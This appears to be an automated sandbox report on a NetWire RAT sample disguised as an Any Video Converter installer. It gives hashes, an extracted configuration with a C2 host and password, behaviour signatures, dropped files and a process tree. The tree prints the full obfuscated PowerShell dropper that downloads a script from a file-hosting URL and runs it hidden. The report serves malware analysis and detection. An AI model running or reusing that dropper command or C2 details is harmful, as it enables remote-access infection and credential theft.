Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 05:05

General

  • Target

    784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe

  • Size

    41.4MB

  • MD5

    718ed13004aee0ac798c8ba3a6a611b1

  • SHA1

    d4e03ba4ed89c82a50f4b0286b41ccba5c2fbe26

  • SHA256

    784219977ec25385fa9ebba5e4f7bd26f9807a7695b9bb3ba5fb910cab8061be

  • SHA512

    ee06e514905c642bc772f5a38408bac22da3ec82920aa346d374cd7a6c3f64f178bfaa7a6273c820e7dd82ec8cafe8dbd45685c9e68e710f3a0a4b400b1c2c69

  • SSDEEP

    786432:cIVnXbLTKsTSBIildiswnDD5fuksujJi9gGGDFYUzgzZrBevOJ4j2QGwcrgbW:1VsI+5EfJsG09sFYUzk8vOJ8gwcrSW

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.top4top.io/m_1891i29ay1.mp4

Extracted

Family

netwire

C2

alice2019.myftp.biz:3360

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    FRAPPE2021

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 2 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Netwire family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe
    "C:\Users\Admin\AppData\Local\Temp\784219977EC25385FA9EBBA5E4F7BD26F9807A7695B9BB3BA5FB910CAB8061BE.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1280
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1596
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2ba0z0q\z2ba0z0q.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1720
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEABE.tmp" "c:\Users\Admin\AppData\Local\Temp\z2ba0z0q\CSC4DDEC263EC854BD5AF9C5F98DBFACCB.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1672
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2632
    • C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe
      "C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:948
      • C:\Users\Admin\AppData\Local\Temp\is-4FQGR.tmp\avc-ultimate.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-4FQGR.tmp\avc-ultimate.tmp" /SL5="$602BA,42677709,137216,C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2432

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\Any-Video-Converter\Any Video Converter Ultimate\avc-ultimate.exe

    Filesize

    41.3MB

    MD5

    b33141c0cc6f9fa0ce2e9d927f6710ca

    SHA1

    3245dda9dd7cb826469941fde7c41a09e283ffc0

    SHA256

    e6891c2c2fd45f118d60044edcf66d394141ea572bfb27d8686e1bc9b36020b1

    SHA512

    0a91e819540575c729cd62e361cd39bbc3b81b29b68606e035a000761304c85f36a8941c0de2305f741f17f32efd7ababa9d5bea277f0f35bb454fa6a6addb0c

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    9124e0eaa9674951a92d70093ede08b9

    SHA1

    5cee26e3f688f83dce0512efbc4554129323a318

    SHA256

    2eb194bb2d884725ab8bc85355d7d842be3a3c331d9ed38d52e983b3e1bb5b16

    SHA512

    273c576789ffe16a80593fe9059611ab5bc28ea76c73ae28ae654760e863b30209812ec4f406b59e3f4c6571e6f9de6184b6241e4f24c026da97e7b329e824cb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    618bc9e069b80c83bf198f1d3bb91d77

    SHA1

    60898977fb4d377ce6d7559cac274df30a611eef

    SHA256

    da4fe36dd1fb1fdd2d549494d268fb8b7d01ea0baaaf8c7ee718ddc84f0b79ec

    SHA512

    69bba6dcd5743512145d3b44a1d7dac1aeae4716ef28586a95012769c97f6bd973c0173aa7fd0dcb05b69579a3bf81d1fc7d17f0768a07ea2607c700ea74e297

  • C:\Users\Admin\AppData\Local\Temp\$inst\0005.tmp

    Filesize

    1.3MB

    MD5

    91f0120c96e48e31d29f0a5d5507866c

    SHA1

    ca3ae973ebb1861de17a8659b0f0de86d384f4b6

    SHA256

    34f0b712e91636e228a516fa5f6e0ef6d819b96cadcf959a7ab11e343b6f8e00

    SHA512

    5099911ca8d3bc5552bb4ff543e0b5d128a6c090625c1cd4cc43f4f1b3b6dd1b717f30f67cc951fcaa52fdd25ef0f588eccbdc86798364c714923d0278304f2c

  • C:\Users\Admin\AppData\Local\Temp\RESEABE.tmp

    Filesize

    1KB

    MD5

    63689f161db1db71f78c8d57f01c7af3

    SHA1

    91d6dd59e756e7550e1858ea1d6e58a9d8d70d55

    SHA256

    bc1e7efebc18d44343101262630dc81e9b0f5a63dc6937be28a881de74105734

    SHA512

    f1cb40a89e6b3fe9070a5074898352c5ca7f648c7851b1458aeaba4c9f812f7289d9e88c2913e8cfcbc9bd73739e7bff72432981fa7a10c3a5477d5aec3bc1ec

  • C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1

    Filesize

    232KB

    MD5

    7e9a5c74501529c97a0675dc7d3e36cc

    SHA1

    c090ead740db008ed6bb1832c31065911103e349

    SHA256

    c4facee5b8bdcb71ad41e600c454bb96a26fb4ab0888285e7182be1ed997b157

    SHA512

    81dfac6d2c9ff07078c4dd356b820c4479683f65f8610be5b010f012183141775d8b5e035f8f34e95cd28f4fd969db5abb3f00d410434d5900c7dba5fcda6716

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ydtkcgri.0ip.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\is-4FQGR.tmp\avc-ultimate.tmp

    Filesize

    1.1MB

    MD5

    7fffc9d80d54551bc786b91137a1a960

    SHA1

    9302425c93c4eaa2f0b41fbfebe817fed6c4f240

    SHA256

    4bec5b6b36528b46e18ba64efbf734ee25cceec0d2e8ebb22e097f208a9ea1a4

    SHA512

    d37224ac1c0ed77da336673e6ee204424ed4ab05aa952c521f920dc134780fd48d8a58f9b78aac3e729e5a597705e6b4e642f2602c2d664776f2edef93abe584

  • C:\Users\Admin\AppData\Local\Temp\is-KKR5R.tmp\SoundCardConf.dll

    Filesize

    1.6MB

    MD5

    21f9e77769bca6b8b187b787f3c3086b

    SHA1

    816ef51f7e1523860cc98987e5a28d98eaa61ce0

    SHA256

    709e63042f882160ddab316475616eb47ff027eb92d898318a242b786dda9fe3

    SHA512

    42ab4e668a8484136933161c71d9b80a640ab6a96090be45cd6dfd7764b863e907dacffc46a09dbdfb483093f62482a848e976367f166690b765ea15ea814a67

  • C:\Users\Admin\AppData\Local\Temp\is-KKR5R.tmp\drvman.dll

    Filesize

    88KB

    MD5

    0f66c9c3fde3db6e543ebbb49099b626

    SHA1

    d2ff83a28a07445496c99588de510c6c92d4a08e

    SHA256

    52a90531785f52b37efb59444712054e3b5748a4213d4af31728718f55962702

    SHA512

    f56dbcb2b436c8054849044126b020ed0318dd760561154bd8b4a99dea83197c0dce24107daee9e73c47702fac5c1df0086cc3f080f64b883eadb66679652260

  • C:\Users\Admin\AppData\Local\Temp\z2ba0z0q\z2ba0z0q.dll

    Filesize

    13KB

    MD5

    8014f704f8bbf6c5f3e5596556a279e3

    SHA1

    b636b7b3b5ac790c0773bcafc4c41a9191b2bfec

    SHA256

    15afc9d4b929b13fca68f153b7d71ac2602e8b1a7a2a584a548e015656ca60f0

    SHA512

    8806650c9f47c87d5402c81d05ec81e0330cbf18663fd4d66814bc4c435aa9a4b63b534d6596e4e31c3deb34da9722dff021e9b74b7c57ee8c9fda4eff9c52bc

  • C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs

    Filesize

    153KB

    MD5

    2591c7f4c1ebca785ccb7c074f66782a

    SHA1

    080fa10f63666f48ed0136eb6dfbe5b914292668

    SHA256

    d87330ce060e28593a0a7eb54b4191f83afed4772e63f6330d0be7312c02f5ec

    SHA512

    658e9d852a73bf2a2fa72e1d553958657a0abd32451c45477ba80dd16be4946c1f84c9d40cfb7a955b534f76c7bd0ec106400c53a62fcbb2b3d5401cdc4d44d6

  • \??\c:\Users\Admin\AppData\Local\Temp\z2ba0z0q\CSC4DDEC263EC854BD5AF9C5F98DBFACCB.TMP

    Filesize

    652B

    MD5

    a4fc920e03ae2995a832f0f284be59c5

    SHA1

    97de7fa7e3a5403bc37faed26c57e6c76c628a81

    SHA256

    01d2ff501b94f20fadebd56d8ded81f80174cd008d162e7a3c56f48c9b2adcc7

    SHA512

    955965195eca39afbfc39e8b785abc9cfddf005c84218107c1a798d9d4af56224c4a83b5b831817fbbb57a38ffe9e7ede8f8ec52f900f469f96462763ddf359f

  • \??\c:\Users\Admin\AppData\Local\Temp\z2ba0z0q\z2ba0z0q.0.cs

    Filesize

    13KB

    MD5

    e03b1e7ba7f1a53a7e10c0fd9049f437

    SHA1

    3bb851a42717eeb588eb7deadfcd04c571c15f41

    SHA256

    3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

    SHA512

    a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

  • \??\c:\Users\Admin\AppData\Local\Temp\z2ba0z0q\z2ba0z0q.cmdline

    Filesize

    327B

    MD5

    46d5fa2b97182e1344aa8aa0a7e24fda

    SHA1

    f166e75a37212a52fe2597973588990c4cd6c5f1

    SHA256

    624f61765698ef34bbf6b07e8aa042cfbab611e6eeeec0bf3580d8c940fab74c

    SHA512

    6bb455c40b909b89e8bcbe66ebb6c838921b68e41763c7adad45f16f952d5e6c2a6ead439e632b26bf30f8b41f6fb382ebf05402187c0f370271399ecbb5c579

  • memory/948-70-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

  • memory/948-99-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

  • memory/1596-126-0x00000000071F0000-0x00000000071FA000-memory.dmp

    Filesize

    40KB

  • memory/1596-111-0x0000000008120000-0x00000000086C4000-memory.dmp

    Filesize

    5.6MB

  • memory/1596-112-0x00000000075B0000-0x0000000007626000-memory.dmp

    Filesize

    472KB

  • memory/2168-54-0x00000000726A0000-0x0000000072E50000-memory.dmp

    Filesize

    7.7MB

  • memory/2168-51-0x0000000004F80000-0x0000000004FB6000-memory.dmp

    Filesize

    216KB

  • memory/2168-72-0x0000000006090000-0x00000000063E4000-memory.dmp

    Filesize

    3.3MB

  • memory/2168-97-0x00000000726AE000-0x00000000726AF000-memory.dmp

    Filesize

    4KB

  • memory/2168-98-0x00000000726A0000-0x0000000072E50000-memory.dmp

    Filesize

    7.7MB

  • memory/2168-77-0x0000000006550000-0x000000000656E000-memory.dmp

    Filesize

    120KB

  • memory/2168-50-0x00000000726AE000-0x00000000726AF000-memory.dmp

    Filesize

    4KB

  • memory/2168-58-0x0000000005F20000-0x0000000005F86000-memory.dmp

    Filesize

    408KB

  • memory/2168-81-0x0000000007950000-0x00000000079EC000-memory.dmp

    Filesize

    624KB

  • memory/2168-80-0x0000000006A90000-0x0000000006AAA000-memory.dmp

    Filesize

    104KB

  • memory/2168-57-0x0000000005E40000-0x0000000005EA6000-memory.dmp

    Filesize

    408KB

  • memory/2168-56-0x0000000005D50000-0x0000000005D72000-memory.dmp

    Filesize

    136KB

  • memory/2168-55-0x00000000726A0000-0x0000000072E50000-memory.dmp

    Filesize

    7.7MB

  • memory/2168-79-0x0000000007C90000-0x000000000830A000-memory.dmp

    Filesize

    6.5MB

  • memory/2168-78-0x0000000006590000-0x00000000065DC000-memory.dmp

    Filesize

    304KB

  • memory/2168-135-0x00000000726A0000-0x0000000072E50000-memory.dmp

    Filesize

    7.7MB

  • memory/2168-53-0x0000000005620000-0x0000000005C48000-memory.dmp

    Filesize

    6.2MB

  • memory/2432-150-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-153-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-174-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-100-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-138-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-141-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-144-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-147-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-171-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-168-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-156-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-159-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-162-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-165-0x0000000000400000-0x0000000000531000-memory.dmp

    Filesize

    1.2MB

  • memory/2632-128-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

  • memory/2632-129-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

  • memory/2932-96-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB